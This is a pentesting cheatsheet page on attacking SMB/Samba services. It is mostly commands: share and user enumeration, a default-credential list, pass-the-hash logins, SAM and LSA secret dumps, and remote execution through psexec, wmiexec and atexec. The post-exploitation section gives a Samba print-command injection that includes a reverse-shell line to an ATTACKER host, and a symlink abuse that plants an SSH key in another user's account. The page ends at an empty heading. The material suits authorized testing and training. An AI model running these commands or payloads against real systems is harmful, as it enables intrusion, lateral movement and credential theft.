daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

overview.md (35468B)


      1 ---
      2 title: "139,445 - Pentesting SMB"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/pentesting-smb/README.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-smb/README.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: true
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # 139,445 - Pentesting SMB
     14 
     15 ## Port 139
     16 
     17 NetBIOS provides naming, datagram, and session services to applications. NetBIOS names are 16-byte identifiers (commonly described as 15 visible characters plus a service suffix). SMB can use the NetBIOS Session Service over TCP port **139**, although modern SMB commonly uses direct TCP instead.<sup>[[9]](#references)</sup>
     18 
     19 ```text
     20 139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
     21 ```
     22 
     23 ## Port 445
     24 
     25 Port 139 carries the NetBIOS Session Service, while TCP port 445 (`microsoft-ds`) carries SMB directly. **SMB** stands for **Server Message Block**. **CIFS** refers to the older SMB1 dialect and should not be used as a synonym for modern SMB2/SMB3. SMB provides shared access to resources such as files, printers, and named pipes.<sup>[[9]](#references)[[10]](#references)</sup>
     26 
     27 When SMB is observed on port 445 it is using direct TCP; on port 139 it is transported through NetBIOS over TCP. SMB2 also supports other transports in newer deployments, including RDMA and QUIC for applicable dialects.<sup>[[9]](#references)</sup>
     28 
     29 ```text
     30 445/tcp   open  microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
     31 ```
     32 
     33 ### SMB
     34 
     35 The **Server Message Block (SMB)** protocol uses a client-server model to provide access to files, directories, printers, named pipes, and related network resources. Windows includes SMB client and server components, and the **Samba** project implements SMB for Linux and other Unix-like systems. Compatibility depends on the dialects and security features enabled; current systems may deliberately disable SMB1 and other legacy behavior.<sup>[[10]](#references)</sup>
     36 
     37 An SMB server exports resources as named shares, so the hierarchy visible to a client can differ from the underlying filesystem. Share permissions and filesystem ACLs are separate layers, but a client's **effective** access is constrained by both. Always test the actual operations permitted rather than infer access from a share-listing label alone.
     38 
     39 ### IPC$ Share
     40 
     41 `IPC$` exposes inter-process communication resources such as named pipes. Some servers permit anonymous or guest access through a null session, but current Windows/Samba policies frequently restrict it. When permitted, tools such as `enum4linux` can query:
     42 
     43 - Information on the operating system
     44 - Details on the parent domain
     45 - A compilation of local users and groups
     46 - Information on available SMB shares
     47 - The effective system security policy
     48 
     49 The exact results depend on anonymous-access policy and the privileges of supplied credentials.
     50 
     51 ```bash
     52 enum4linux -a target_ip
     53 ```
     54 
     55 The above command is an example of how `enum4linux` might be used to perform a full enumeration against a target specified by `target_ip`.
     56 
     57 ## What is NTLM
     58 
     59 For protocol details, attack prerequisites, and defenses, see [NTLM](/hacktricks/windows-hardening/ntlm/overview).
     60 
     61 ## **Server Enumeration**
     62 
     63 ### **Scan** a network searching for hosts:
     64 
     65 ```bash
     66 nbtscan -r 192.168.0.1/24
     67 ```
     68 
     69 ### SMB server version
     70 
     71 To evaluate version-specific exposures, determine the server implementation and negotiated SMB dialect. If other tools do not reveal them, you can:
     72 
     73 - Use the **MSF** auxiliary module `**auxiliary/scanner/smb/smb_version**`
     74 - Or this script:
     75 
     76 ```bash
     77 #!/bin/sh
     78 #Author: rewardone
     79 #Description:
     80 # Requires root or enough permissions to use tcpdump
     81 # Will listen for the first 7 packets of a null login
     82 # and grab the SMB Version
     83 #Notes:
     84 # Will sometimes not capture or will print multiple
     85 # lines. May need to run a second time for success.
     86 if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
     87 if [ ! -z $2 ]; then rport=$2; else rport=139; fi
     88 tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
     89 echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
     90 echo "" && sleep .1
     91 ```
     92 
     93 ### **Search exploit**
     94 
     95 ```bash
     96 msf> search type:exploit platform:windows target:2008 smb
     97 searchsploit microsoft smb
     98 ```
     99 
    100 ### **Possible** Credentials
    101 
    102 | **Username(s)**      | **Common passwords**                      |
    103 | -------------------- | ----------------------------------------- |
    104 | _(blank)_            | _(blank)_                                 |
    105 | guest                | _(blank)_                                 |
    106 | Administrator, admin | _(blank)_, password, administrator, admin |
    107 | arcserve             | arcserve, backup                          |
    108 | tivoli, tmersrvd     | tivoli, tmersrvd, admin                   |
    109 | backupexec, backup   | backupexec, backup, arcada                |
    110 | test, lab, demo      | password, test, lab, demo                 |
    111 
    112 ### Brute Force
    113 
    114 - [**SMB Brute Force**](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-hacking/brute-force.md#smb)
    115 
    116 ### Obtain Information
    117 
    118 ```bash
    119 #Dump interesting information
    120 enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
    121 enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
    122 nmap --script "safe or smb-enum-*" -p 445 <IP>
    123 
    124 #Connect to the rpc
    125 rpcclient -U "" -N <IP> #No creds
    126 rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb  --pw-nt-hash
    127 rpcclient -U "username%passwd" <IP> #With creds
    128 #You can use querydispinfo and enumdomusers to query user information
    129 
    130 #Dump user information
    131 /usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
    132 /usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
    133 
    134 #Map possible RPC endpoints
    135 /usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
    136 /usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
    137 /usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
    138 ```
    139 
    140 ### Enumerate Users, Groups & Logged On Users
    141 
    142 This information may already have been gathered by `enum4linux` or `enum4linux-ng`.
    143 
    144 ```bash
    145 crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
    146 crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
    147 crackmapexec smb 10.10.10.10 --loggedon-users [-u <username> -p <password>]
    148 
    149 ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "
    150 
    151 rpcclient -U "" -N 10.10.10.10
    152 enumdomusers
    153 enumdomgroups
    154 ```
    155 
    156 ### Enumerate local users
    157 
    158 [Impacket](https://github.com/fortra/impacket/blob/master/examples/lookupsid.py)
    159 
    160 ```bash
    161 lookupsid.py -no-pass hostname.local
    162 ```
    163 
    164 Oneliner
    165 
    166 ```bash
    167 for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
    168 ```
    169 
    170 ### Metasploit - Enumerate local users
    171 
    172 ```bash
    173 use auxiliary/scanner/smb/smb_lookupsid
    174 set rhosts hostname.local
    175 run
    176 ```
    177 
    178 ### Enumerating LSARPC and SAMR with `rpcclient`
    179 
    180 See the dedicated [`rpcclient` enumeration guide](/hacktricks/network-services-pentesting/pentesting-smb/rpcclient-enumeration).
    181 
    182 ### GUI connection from linux
    183 
    184 #### In the terminal:
    185 
    186 `xdg-open smb://cascade.htb/`
    187 
    188 #### In file browser window (nautilus, thunar, etc)
    189 
    190 `smb://friendzone.htb/general/`
    191 
    192 ## Shared Folders Enumeration
    193 
    194 ### List shared folders
    195 
    196 Always check what the server exposes. If the rules of engagement permit it and no credentials are available, test anonymous and guest access.
    197 
    198 ```bash
    199 smbclient --no-pass -L //<IP> # Null user
    200 smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
    201 
    202 smbmap -H <IP> [-P <PORT>] #Null user
    203 smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
    204 smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
    205 smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list
    206 
    207 crackmapexec smb <IP> -u '' -p '' --shares #Null user
    208 crackmapexec smb <IP> -u 'username' -p 'password' --shares # Password authentication
    209 crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares # NT-hash authentication
    210 ```
    211 
    212 ### **Connect/List a shared folder**
    213 
    214 ```bash
    215 #Connect using smbclient
    216 smbclient --no-pass //<IP>/<Folder>
    217 smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
    218 #Use --no-pass -c 'recurse;ls'  to list recursively with smbclient
    219 
    220 # List with smbmap; without a folder it lists everything
    221 smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
    222 smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
    223 smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
    224 ```
    225 
    226 ### **Manually enumerate windows shares and connect to them**
    227 
    228 Share enumeration may be restricted even when a known share can be reached. It can therefore be useful to try common share names directly. With a valid session, responses such as `NT_STATUS_ACCESS_DENIED` and `NT_STATUS_BAD_NETWORK_NAME` can sometimes distinguish an existing but inaccessible share from a nonexistent one, although servers and security products may normalize errors.
    229 
    230 Common share names on Windows targets include:
    231 
    232 - C$
    233 - D$
    234 - ADMIN$
    235 - IPC$
    236 - PRINT$
    237 - FAX$
    238 - SYSVOL
    239 - NETLOGON
    240 
    241 (Common share names from _**Network Security Assessment 3rd edition**_)
    242 
    243 You can try to connect to them by using the following command
    244 
    245 ```bash
    246 smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
    247 smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
    248 ```
    249 
    250 or this script (using a null session)
    251 
    252 ```bash
    253 #/bin/bash
    254 
    255 ip='<TARGET-IP-HERE>'
    256 shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')
    257 
    258 for share in ${shares[*]}; do
    259     output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')
    260 
    261     if [[ -z $output ]]; then
    262         echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
    263     else
    264         echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
    265     fi
    266 done
    267 ```
    268 
    269 examples
    270 
    271 ```bash
    272 smbclient -U '%' -N \\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
    273 smbclient -U '%' -N \\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
    274 ```
    275 
    276 ### **Enumerate shares from Windows / without third-party tools**
    277 
    278 PowerShell
    279 
    280 ```bash
    281 # Retrieves the SMB shares on the local computer.
    282 Get-SmbShare
    283 Get-WmiObject -Class Win32_Share
    284 # Retrieves the SMB shares on a remote computer.
    285 get-smbshare -CimSession "<computer name or session object>"
    286 # Retrieves the connections established from the local SMB client to the SMB servers.
    287 Get-SmbConnection
    288 ```
    289 
    290 CMD console
    291 
    292 ```bash
    293 # List shares on the local computer
    294 net share
    295 # List shares on a remote computer (including hidden ones)
    296 net view \\<ip> /all
    297 ```
    298 
    299 MMC Snap-in (graphical)
    300 
    301 ```bash
    302 # Shared Folders: Shared Folders > Shares
    303 fsmgmt.msc
    304 # Computer Management: Computer Management > System Tools > Shared Folders > Shares
    305 compmgmt.msc
    306 ```
    307 
    308 explorer.exe (graphical), enter `\\<ip>\` to see the available non-hidden shares.
    309 
    310 ### Mount a shared folder
    311 
    312 ```bash
    313 mount -t cifs //x.x.x.x/share /mnt/share
    314 mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
    315 ```
    316 
    317 ### **Download files**
    318 
    319 Read previous sections to learn how to connect with credentials/Pass-the-Hash.
    320 
    321 ```bash
    322 #Search a file and download
    323 sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
    324 ```
    325 
    326 ```bash
    327 #Download all
    328 smbclient //<IP>/<share>
    329 > mask ""
    330 > recurse
    331 > prompt
    332 > mget *
    333 #Download everything to current directory
    334 ```
    335 
    336 Commands:
    337 
    338 - mask: specifies the mask which is used to filter the files within the directory (e.g. "" for all files)
    339 - recurse: toggles recursion on (default: off)
    340 - prompt: toggles prompting for filenames off (default: on)
    341 - mget: copies all files matching the mask from host to client machine
    342 
    343 (_Information from the manpage of smbclient_)
    344 
    345 ### Domain Shared Folders Search
    346 
    347 - [**Snaffler**](https://github.com/SnaffCon/Snaffler)
    348 
    349 ```bash
    350 Snaffler.exe -s -d domain.local -o snaffler.log -v data
    351 ```
    352 
    353 - [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spider.
    354   - `-M spider_plus [--share <share_name>]`
    355   - `--pattern txt`
    356 
    357 ```bash
    358 sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
    359 ```
    360 
    361 Files named **`Registry.xml`** are especially interesting because legacy Group Policy Preferences may contain recoverable `cpassword` values. **`web.config`** files may also contain application secrets or connection strings.
    362 
    363 > [!TIP]
    364 > The **SYSVOL share** is **readable** by all authenticated users in the domain. In there you may **find** many different batch, VBScript, and PowerShell **scripts**.
    365 > Check these scripts for sensitive information such as passwords. Do not trust automated share labels alone: the effective share and NTFS ACLs determine whether a write succeeds. If the assessment explicitly permits mutation, test with a uniquely named harmless file and remove it immediately; do not alter an existing logon script.
    366 > If writable, you can [poison logon scripts for RCE at user logon](/hacktricks/windows-hardening/active-directory-methodology/acl-persistence-abuse/overview#sysvolnetlogon-logon-script-poisoning).
    367 
    368 ### ShareHound – OpenGraph collector for SMB shares (BloodHound)
    369 
    370 [ShareHound](https://github.com/p0dalirius/sharehound) discovers domain SMB shares, traverses them, extracts ACLs, and emits an OpenGraph JSON file for BloodHound CE/Enterprise.<sup>[[6]](#references)</sup>
    371 
    372 - Baseline collection:
    373   1) LDAP: enumerate computer objects, read `dNSHostName`
    374   2) DNS: resolve each host
    375   3) SMB: list shares on reachable hosts
    376   4) Crawl shares (BFS/DFS), enumerate files/folders, capture permissions
    377 
    378 ShareQL-driven traversal
    379 - [ShareQL](https://github.com/p0dalirius/shareql) is a first-match-wins DSL to allow/deny traversal by host/share/path and set per-rule max depth. Focus on interesting shares and cap recursion.<sup>[[7]](#references)</sup>
    380 
    381 Example ShareQL rules
    382 ```text
    383 # Only crawl shares with name containing "backup", up to depth 2
    384 allow host * share * path * depth 0
    385 allow host * share *backup* path * depth 2
    386 deny  host * share * path *
    387 ```
    388 
    389 Usage
    390 ```bash
    391 sharehound -ai "10.0.100.201" -au "user" -ap "Test123!" -ns "10.0.100.201" \
    392   -rf "rules/skip_common_shares.shareql" -rf "rules/max_depth_2.shareql"
    393 ```
    394 - Provide AD creds via `-ad`/`-au`/`-ap` (or use `-ad` with `-au`/`-ap`). Use `-r`/`-rf` for inline rules or files.
    395 - Output: JSON OpenGraph; import in BloodHound to query hosts/shares/files and effective rights.
    396 - Tip: Limit max depth to 1–2 unless your filters are very restrictive.
    397 
    398 BloodHound attack-surface queries
    399 - Principals with write-like access on shares
    400 ```text
    401 MATCH x=(p)-[r:CanWriteDacl|CanWriteOwner|CanDsWriteProperty|CanDsWriteExtendedProperties]->(s:NetworkShareSMB)
    402 RETURN x
    403 ```
    404 
    405 - Principals with FULL_CONTROL on shares
    406 <details>
    407 <summary>Cypher: principals with FULL_CONTROL on shares</summary>
    408 
    409 ```text
    410 MATCH (p:Principal)-[r]->(s:NetworkShareSMB)
    411 WHERE (p)-[:CanDelete]->(s)
    412   AND (p)-[:CanDsControlAccess]->(s)
    413   AND (p)-[:CanDsCreateChild]->(s)
    414   AND (p)-[:CanDsDeleteChild]->(s)
    415   AND (p)-[:CanDsDeleteTree]->(s)
    416   AND (p)-[:CanDsListContents]->(s)
    417   AND (p)-[:CanDsListObject]->(s)
    418   AND (p)-[:CanDsReadProperty]->(s)
    419   AND (p)-[:CanDsWriteExtendedProperties]->(s)
    420   AND (p)-[:CanDsWriteProperty]->(s)
    421   AND (p)-[:CanReadControl]->(s)
    422   AND (p)-[:CanWriteDacl]->(s)
    423   AND (p)-[:CanWriteOwner]->(s)
    424 RETURN p,r,s
    425 ```
    426 
    427 </details>
    428 
    429 - Hunt sensitive files by extension (e.g., VMDKs)
    430 ```text
    431 MATCH p=(h:NetworkShareHost)-[:HasNetworkShare]->(s:NetworkShareSMB)-[:Contains*0..]->(f:File)
    432 WHERE toLower(f.extension) = toLower(".vmdk")
    433 RETURN p
    434 ```
    435 
    436 ## Read Registry
    437 
    438 You may be able to **read the registry** using some discovered credentials. Impacket **`reg.py`** allows you to try:
    439 
    440 ```bash
    441 sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
    442 sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
    443 sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
    444 ```
    445 
    446 ## Post Exploitation
    447 
    448 The **default config of** a **Samba** server is usually located in `/etc/samba/smb.conf` and might have some **dangerous configs**:<sup>[[2]](#references)</sup>
    449 
    450 | **Setting**                 | **Description**                                                     |
    451 | --------------------------- | ------------------------------------------------------------------- |
    452 | `browseable = yes`                 | Makes the share visible in browse/share lists.                                   |
    453 | `read only = no`                   | Allows writes when the effective filesystem permissions also permit them.         |
    454 | `writable = yes`                   | Synonym for `read only = no`.                                                     |
    455 | `guest ok = yes`                   | Allows access without a password, mapped according to the guest-account settings. |
    456 | `printable = yes`                  | Exposes the share as a printer queue rather than a disk share.                    |
    457 | `print command = ... %J %s`        | Runs a server-side print command with substituted job metadata and spool path.     |
    458 | `enable privileges = yes`          | Enables the privilege subsystem used for privileges assigned to SIDs.             |
    459 | `force user = <name>`              | Performs file operations as the specified UNIX user after connection setup.        |
    460 | `wide links = yes`                 | Permits following symlinks outside the exported tree when related safeguards allow it. |
    461 | `allow insecure wide links = yes`  | Removes Samba's safety coupling between `wide links` and UNIX extensions.          |
    462 | `create mask = 0777`               | Limits permission bits that clients may set on newly created files.                |
    463 | `directory mask = 0777`            | Limits permission bits that clients may set on newly created directories.          |
    464 | `logon script = script.sh`         | Specifies a client-side logon script path for domain logons.                       |
    465 | `magic script = script.sh`         | Names a file whose close event triggers server-side execution.                     |
    466 | `magic output = script.out`        | Names the file that receives output from the magic script.                         |
    467 
    468 The command `smbstatus` gives information about the **server** and about **who is connected**.
    469 
    470 ### Printable shares and shell-based `print command` injection
    471 
    472 A **printer share** may look uninteresting because `ls` fails, but it can still accept jobs via `smbclient`'s `print <filename>` command. Enumerate them with:
    473 
    474 ```bash
    475 smbclient -L //<IP>/ -N
    476 rpcclient -N -U "" <IP> -c 'enumprinters; netshareenumall'
    477 ```
    478 
    479 If the server-side share uses a shell-based `print command`, treat any `print command` line containing `%J` as high risk. NVD describes CVE-2026-4480 as Samba passing the **client-controlled job description string** into `print command` via `%J` without escaping shell metacharacters, turning the print job name into an OS command injection primitive.<sup>[[1]](#references)[[3]](#references)</sup>
    480 
    481 Typical risky pattern:
    482 
    483 ```ini
    484 [printer]
    485 path = /var/spool/samba
    486 printable = yes
    487 guest ok = yes
    488 print command = /usr/local/bin/print-helper %J %s
    489 ```
    490 
    491 Quick checks and abuse ideas:
    492 
    493 ```bash
    494 # confirm the share is printable even if directory listing fails
    495 smbclient //<IP>/PRINTER -N
    496 smb: \> print payload
    497 
    498 # search local configs after foothold on the server
    499 grep -R "^[[:space:]]*print command\|%J\|printable\|guest ok" /etc/samba 2>/dev/null
    500 
    501 # if %J is injected into a shell command, the job name itself becomes interesting
    502 echo 'id' > '|sh'
    503 smbclient //<IP>/PRINTER -N -c 'print "|sh"'
    504 
    505 echo 'bash -i >& /dev/tcp/ATTACKER/443 0>&1' > '|bash'
    506 smbclient //<IP>/PRINTER -N -c 'print "|bash"'
    507 ```
    508 
    509 The same primitive can also be reached over the `\pipe\spoolss` RPC endpoint: open the printer, set `DocumentInfo1.document_name` to the malicious job name that should land in `%J`, write the body as the spool data, and finish the job to trigger the print command.
    510 
    511 ### `wide links` + `force user` = write outside the share as another UNIX user
    512 
    513 `wide links = yes` lets Samba follow symlinks that point **outside** the exported path. The official Samba docs note that this is normally constrained by UNIX extensions, and that `allow insecure wide links = yes` removes that protection. If the same share also sets `force user = <victim>`, then an authenticated user can make Samba **write as the forced UNIX account**.<sup>[[2]](#references)</sup>
    514 
    515 High-value combination:
    516 
    517 ```ini
    518 [transfer]
    519 path = /srv/transfer
    520 valid users = scott
    521 force user = marcus
    522 read only = no
    523 wide links = yes
    524 
    525 [global]
    526 allow insecure wide links = yes
    527 unix extensions = no
    528 ```
    529 
    530 Abuse flow:
    531 
    532 ```bash
    533 # from a shell on the Samba server
    534 ln -s /home/marcus /srv/transfer/marcus
    535 
    536 # traverse the symlink over SMB, not locally
    537 smbclient //<IP>/transfer -U scott%PASSWORD
    538 smb: \> ls
    539 smb: \> cd marcus
    540 smb: \marcus\> mkdir .ssh
    541 smb: \marcus\> put ~/.ssh/id_ed25519.pub .ssh/authorized_keys
    542 ```
    543 
    544 The important nuance is that local filesystem access may still fail for the attacker, but SMB traversal succeeds because Samba performs the operation as the **forced user**, not as the account that authenticated to the share.<sup>[[1]](#references)</sup>
    545 
    546 ### Loot readable backup configs after Samba footholds
    547 
    548 After landing on a Samba host, look for backup/sync configs such as `rclone.conf`. Rclone documents that config passwords are only **obscured**, not securely protected, so readable config files can expose reusable secrets:<sup>[[1]](#references)[[4]](#references)</sup>
    549 
    550 ```bash
    551 find / -name rclone.conf 2>/dev/null
    552 rclone reveal <obscured_secret>
    553 ```
    554 
    555 Related Veeam backup-artifact workflow:
    556 
    557 [Pentesting Veeam Backup And Replication](/hacktricks/network-services-pentesting/pentesting-veeam-backup-and-replication)
    558 
    559 ## Authenticate using Kerberos
    560 
    561 You can **authenticate** to **kerberos** using the tools **smbclient** and **rpcclient**:
    562 
    563 ```bash
    564 smbclient --kerberos //ws01win10.domain.com/C$
    565 rpcclient -k ws01win10.domain.com
    566 ```
    567 
    568 In Kerberos-only environments (NTLM disabled), NTLM attempts against SMB may return `STATUS_NOT_SUPPORTED`. Fix common Kerberos issues and force Kerberos auth:<sup>[[1]](#references)[[5]](#references)</sup>
    569 
    570 ```bash
    571 # sync clock to avoid KRB_AP_ERR_SKEW
    572 sudo ntpdate <dc.fqdn>
    573 
    574 # use Kerberos with tooling (reads your TGT from ccache)
    575 netexec smb <dc.fqdn> -k
    576 ```
    577 
    578 For a complete client setup (`krb5.conf` generation, `kinit`, and GSSAPI/SPN caveats), see [Pentesting Kerberos](/hacktricks/network-services-pentesting/pentesting-kerberos-88/overview).<sup>[[8]](#references)</sup>
    579 
    580 ## **Execute Commands**
    581 
    582 ### **crackmapexec**
    583 
    584 CrackMapExec can execute commands through methods including **mmcexec, smbexec, atexec, and wmiexec**; supported choices and defaults vary by release. Select a method with `--exec-method`:
    585 
    586 ```bash
    587 apt-get install crackmapexec
    588 
    589 crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
    590 crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami # Execute cmd
    591 crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
    592 # Using --exec-method {mmcexec,smbexec,atexec,wmiexec}
    593 
    594 crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
    595 crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa # Dump LSA secrets
    596 crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions # Get sessions
    597 crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
    598 crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
    599 crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
    600 crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
    601 crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
    602 crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
    603 crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute
    604 
    605 crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
    606 ```
    607 
    608 ### [**psexec**](/hacktricks/windows-hardening/lateral-movement/psexec-and-winexec) / [**smbexec**](/hacktricks/windows-hardening/lateral-movement/psexec-and-winexec#impacket-smbexecpy-smbexec)
    609 
    610 Both options will **create a new service** (using _\pipe\svcctl_ via SMB) in the victim machine and use it to **execute something** (**psexec** will **upload** an executable file to ADMIN$ share and **smbexec** will point to **cmd.exe/powershell.exe** and put in the arguments the payload --**file-less technique-**-).\
    611 See the dedicated [psexec and smbexec page](/hacktricks/windows-hardening/lateral-movement/psexec-and-winexec) for protocol details and additional examples.\
    612 In **kali** it is located on /usr/share/doc/python3-impacket/examples/
    613 
    614 ```bash
    615 #If no password is provided, it will be prompted
    616 ./psexec.py [[domain/]username[:password]@]<targetName or address>
    617 ./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
    618 psexec \\192.168.122.66 -u Administrator -p 123456Ww
    619 psexec \\192.168.122.66 -u Administrator -p '<password>' # Sysinternals PsExec password authentication
    620 ```
    621 
    622 With Impacket, `-k` requests Kerberos authentication instead of NTLM (usually using the current credential cache or supplied credentials).
    623 
    624 ### [wmiexec](/hacktricks/windows-hardening/lateral-movement/wmiexec)/dcomexec
    625 
    626 Stealthily execute a command shell without touching the disk or running a new service using DCOM via **port 135.**\
    627 In **kali** it is located on /usr/share/doc/python3-impacket/examples/
    628 
    629 ```bash
    630 #If no password is provided, it will be prompted
    631 ./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
    632 ./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
    633 #You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
    634 ```
    635 
    636 With Impacket, `-k` requests Kerberos authentication instead of NTLM.
    637 
    638 ```bash
    639 #If no password is provided, it will be prompted
    640 ./dcomexec.py [[domain/]username[:password]@]<targetName or address>
    641 ./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
    642 #You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
    643 ```
    644 
    645 ### [AtExec](/hacktricks/windows-hardening/lateral-movement/atexec)
    646 
    647 Execute commands via the Task Scheduler (using _\pipe\atsvc_ via SMB).\
    648 In **kali** it is located on /usr/share/doc/python3-impacket/examples/
    649 
    650 ```bash
    651 ./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
    652 ./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"
    653 ```
    654 
    655 ## Impacket reference
    656 
    657 [https://www.hackingarticles.in/impacket-guide-smb-msrpc/](https://www.hackingarticles.in/impacket-guide-smb-msrpc/)
    658 
    659 ### ksmbd attack surface and SMB2/SMB3 protocol fuzzing (syzkaller)
    660 
    661 See [ksmbd attack surface and SMB2/SMB3 protocol fuzzing](/hacktricks/network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller).
    662 
    663 ## **Bruteforce users credentials**
    664 
    665 **This is not recommended, you could block an account if you exceed the maximum allowed tries**
    666 
    667 ```bash
    668 nmap --script smb-brute -p 445 <IP>
    669 ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
    670 ```
    671 
    672 ## SMB relay attack
    673 
    674 An SMB relay attack captures or coerces an NTLM authentication attempt and forwards it to another service that accepts it. Success depends on protocol protections (especially SMB signing and channel binding), target configuration, account restrictions, and the relayed account's privileges. A successful relay may allow actions such as share access or remote administration, but it does not automatically yield a SYSTEM shell.<sup>[[11]](#references)</sup>\
    675 [**More information about this attack here.**](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
    676 
    677 ## SMB-Trap
    678 
